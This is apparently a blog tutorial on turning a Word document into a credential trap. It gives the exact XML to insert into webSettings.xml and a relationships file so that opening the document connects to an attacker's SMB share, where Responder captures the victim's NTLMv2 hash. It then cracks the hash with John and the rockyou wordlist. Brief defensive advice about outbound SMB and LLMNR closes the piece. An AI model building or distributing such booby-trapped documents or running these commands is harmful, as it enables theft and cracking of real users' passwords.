Office or Web Page to Steal NTLM Passwords Hashes

We've covered stealing NTLM password hashes here by allowing Windows to broadcast when connecting to a non-existent share or name resolution of WPAD. Preventing LLMNR in GPO and creating a WPAD DNS record prevents this attack with Responder.  

It's easy to prevent the broadcasting of credentials, and direct harvesting is a little more difficult to overcome. In this example, Word 2019 will be used. PDF, RFT, Excel, Powerpoint, and Websites can all be leveraged to steal NTLM hashes.

Create a new Word document and add some content to create metadata. 

You will need 7-Zip or Winrar to 'Open with'.

CD to 'Word'.

Copy WebSettings.xml to the Desktop.

Open WebSettings.xml with Notepad and enable 'Word Wrap'.

In between 'w16e w16cid' and '<w:optimize...' paste the following.

<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

So it looks like this:

Create a new file named 'webSettings.xml.rels'.

Paste the following, update the IP to that of Kali.

 

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.1.1.100\Office Add-ins" TargetMode="External"/>

</Relationships>

Copy 'webSettings.xml' from the Desktop and replace the original version within WinRar.

CD '_rels'

Copy 'webSettings.xml.rels' into the folder.

Close WinRar.

Prior to distributing, logon to Kali, open a Terminal Windows and type 'responder -I eth0 -wFv'

To test, open the Word document.

The giveaway is that Word is clearly trying to connect to the Share.

 

Note. If Kali is not available then Word hangs whilst waiting for Kali to respond.  

The User tries to authenticate to a non-existent share and their password hash is passed to Responder.

Responder logs all its activity, browse or cd ​/usr/share/responder/logs

The wordlist is stored at /usr/share/wordlists and 'rockyou.txt' is the wordlist of choice today.

Run the following 'John' command.

john /usr/share/responder/SMB-NTLMv2-SSP-10.1.1.107.txt --wordlist:/usr/share/wordlists/rockyou.txt

If you are lucky and the user has a known simple password it will be cracked in no time. There are alternatives to rockyou and far newer and much larger wordlists are available via a Google search.

The same can be achieved with connecting to a Website, despite the WPAD DNS Record being in place. It's just a matter of tricking the user into connecting.

Now, this is going to be a challenge as this is standard behaviour for Windows when connecting to a Share or Website. AV, Applocker and in many cases Firewall won't prevent these types of attacks especially port 80 and 443 traffic. The edge firewalls shouldn't allow outbound SMB traffic on 445 and the client's firewalls should name the IP's for any internal SMB Shares. As for web traffic, I'm not sure there is a fix.